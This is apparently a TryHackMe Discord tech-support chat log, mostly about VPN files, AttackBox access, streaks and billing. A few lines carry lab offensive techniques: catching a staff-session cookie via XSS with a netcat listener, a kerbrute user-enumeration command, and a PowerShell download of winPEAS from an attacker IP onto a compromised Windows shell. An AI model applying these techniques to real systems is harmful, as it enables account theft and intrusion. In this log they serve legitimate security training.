I think I've run once again into timezone-related bugs

Who could I talk to?

Me

Alright, can I DM?

Yup

Sometimes they are a bit sketchy, especially the Windows machines

The specs on the EC2 instances are very low

Tim isn't in today, I've just had a look at it.

Looks like it's a version specific issue, and the command provided worked with the vm provided, but it's less than ideal. Looks like you can add dir onto the end of the command and it's valid in both that version and the up to date version on my machine, so i've gone with that as a fix

Hey @weary spindle

Okay, the VPN is creating a tunnel to the THM machines.

When you start a machine up you'll get this.

but i have attack box opened why should I need it?

You don't

You only need to connect to the VPN if you're using your host OS or VM.

Yea ik that

Oh oke

so i dont need it in my case

Not if you're working out the attackbox

Okay thanks @weary spindle

Gave +1 Rep to @weary spindle

If your PC/Laptop can handle a VM.

it cant

thats why my pc sucks

Hey, everyone! How is it going?
I'm having troubles to get the staff-session cookie on the XSS room, can someone help me?

I'm setting everything right but I keep the listening server running for almost an hour and nothing happens.

the room is kinda bugged so you need to use the attackbox to catch the token using either a python web server or netcat

Ok, I'm goona try it and get back to you

It worked, thanks a lot @plush bay !!!

Gave +1 Rep to @plush bay

no problem

Hi i am doing Kerberos and i think this command isnt right, prooved it and didnt work
./kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local User.txt
worked like this
./kerbrute userenum --dc <ip> -d CONTROLLER.local User.txt

Hello, i,m new here. i am at https://tryhackme.com/room/walkinganapplication and i try to open https://10-10-107-215.p.thmlabs.com/ thru Atack box i get connection time out. Do i have to do something else? It's my first time usint Atack Box

Wait a bit longer, or try using the IP, instead of the URL, so just use 10.10.107.215 in your browser

http://10.10.107.215/

ahhhh, was too slow

Way too slow for me, yes 😄

thank you. Using https://10.10.107.215 i get Unable to connect. Using http://10.10.107.215 it just hangs loading but i get page title "Acme It support - home"

if finaly loaded using http

thank you both!

why i can't copy/paste from AttackBox to my webbrowser

?

https://media.discordapp.net/attachments/692456966802374687/921063860318924800/clipboard.gif

ahh, i see, me stupid 😦

thank you

i need to acces: https://static-labs.tryhackme.cloud/sites/thm-web-framework and i get time out. Do you know the ip of this server?

i don't think so but i could be wrong

but to add it to host don't i need the ip?

sorry

Attackbox

but now Attack Box lost connection all togheter

are you subbed?

cuz attackbox doesn't have internet for free users

no, i have free account. But to get one flag it say to go to https://static-labs.tryhackme.cloud/sites/thm-web-framework.

yeh, just visit that site on your own machine

don't even need a vpn for that(I think)

ok, i thought it was a local site for tryhackme not accesible from outside

i must start to think like a hacker 😄

thank you

i can't get Attackbox to reconect. i will probably instal kali in vm and use vpn to connect

"attackbox doesn't have internet for free users"

also, as a free user you only get an hour of using attackbox

Is it possible to get the JSESSIONID cookie through javascript?

yeh, through "xss"

that might be my problem. i thought if i add 1 extra hour will work...

I have tried through xss, i use document.cookie and it returns all cookies except for JSESSIONID

is this for a thm room?

This is for a bug bounty

ah, well we can't really help with that stuff

Hi, guys i need a streak restoration how can i get it back ?

You'd need to contact support and ask them to do it nicely.

!email

how long can i wait before contacting them ?

Now?

just saying i can't keep my streak up because i'm in Cisco Network academy and trying to build up my portfolio

do i ask them now for the maximum number of days i can get ?

before restoring it.

If you plan to stop I don't know how they will go about it.

i'm just stopping for few days

well, ill contact them and see what will they say

Yeah.

done

?... i wanna know if there is a comptia here in discords thm. I am doing kerberos from comptia pentest+ and i dont know where put my questions

Thanks!!!💯

I don't know why I can't download my openvpn configuration file

#site-support message

Oh thank you very much. I am sorry for disturbing you.

Gave +1 Rep to @crystal marlin

No disturbance occurred 🙂

Hi im running kali on virtual box on windows 10 using NAT. I am trying to transfer a file from linux to the windows box where i have a shell, ive tried wget, curl, invoke -web request and nothing works however my http server does log the GET request, any help?

what's your wget command? you might need to add -o filename to get it to output

powershell.exe Invoke-WebRequest -Uri "http://10.10.14.3:8081/winPEASx64.exe" -OutFile "C:\Users\kostas\Downloads\test.exe"

hmm, you should be getting a file out if you have perms to write to that folder... unless it wants escaped \'s on the path? so \\

I've never experienced a BSoD with either hypervisor

Also virtualization is turned on from the bios

Hi, i lost my 80+ steak even if i haven't missed a single day ;-;

oh

lol

never mind, it came back to normal

Hey folks! Trying to update Kali, but I constantly keep getting this out of space error. I have given 65gb for this VM and I'm still getting this error. Would appreciate any guidance here

Was anyone able to solve this room? https://tryhackme.com/room/btredlinejoxr3d I´m stuck on creating a standard collector in redline and it get´s stuck on creating a new analysis session aswell

is this room or bugged or so?

try #room-help

@clear hedge Well that´s where i´m coming from .. but like nobody could help me or answer my question

@gray loom yes and i did wait even longer than 60 minutes still..

Stirve, you've been here long enough to know that this channel is for directly tryhackme related tech support like site and VPN issues

I did, most of it suggested clearing old install files etc, but I have a fresh install here, so I may have to expand a certain partition, idk which one though

This channel is for VPN and other technical questions related to TryHackMe

hey quck question,
how do you get rolls?
just asking out of interest👍

quick*

thx

it worked, thank you again

Hi, ive been having this problem with all the linux machines so far, can you please help me understand why I can't see the THM machine? I have a picture but I can't attach it.

Are you connected to the VPN?

it's through attackbox

!docs verify

And you'll be able to provide screenshots.

here's what I see rather than:

I don't understand, what target machine?

I'm at linux fundamentals 3

yes

where do I do it?

I did, and it also didn't work, but I turned off the machine and somehow it opened by itself

Thanks! I'll try again

Can i use dashes (-) in my profile username?

Hi, my vpn stopped working so I tried to generate a new one. But the VPN config download button leads to a 404 page

hey guys, im trying to output gobuster dirs ti a specific file, do i need to make the file first or can i just -o to it,

when i -o it gives me an error

this is the error i get

nevermind, im dumb, forgot my ujser account

Try changing the server and downloading again a few times
This happens sometimes

Thanks, I'll try next time I have a chance

Gave +1 Rep to @finite aurora

No, only alpha-numeric characters.

do i need to be subscribed to thm to be able to verify?

nvm

Hi, can't download openvpn config for Wreath network, getting 404 error. Rejoining didn't help. How to fix this issue?

Leave the room for 15 min(s), it might work then.

Hey I got the subscription but nothing happened, is their a delay when you buy it or do I gotta wait a day

No, it's instant.

oh it still says go premium

IF it's successful in payment

and it charged me

Try CTRL and F5.

yea I refreshed it

nothing happened

do they have some support thing

You may need to contact support then.

!email

yeah there is the support email

so it didn't work(

Nevermind

it took a while

it registered

Ah, that's good.

thank you

is there a way by which I can do copy, paste from browser(on my local machine) to kali VM provided by THM?

Yes there a clipboard, you can paste things in clipboard and can paste anywhere in VM

At most left you will see an arrow icon, just hover it and you will see a clipboard icon.

i have a question

https://dontasktoask.com

seems to be an issue with the Linux Forensics room. Doesn't open split screen like the room suggests. Also can't SSH in

Did all that 🙂

think I just resolved it...

Is there a spelling mistake in the answer to Linux Forensics Task 6 Q1?

I don’t want to give the answer away. But I’m reading the bash history and looking at what I think is the answer but not correct. I’m sure I’m just wrong lol !

I've let my bank card lapse but have changed over to PayPal.

I'm guessing THM did not receive any payment from me as my card is now expired and I have received an email from THM about the lapse in payment.

Will switching my payment method automatically incure the payment? Or is there another step I need to take?

There was no feedback after switching

I think you're looking at the wrong users bash history. Also, try to keep these question to one channel, such as #room-hints #room-help or, where the room is new, its specific room (like #981546948853112842).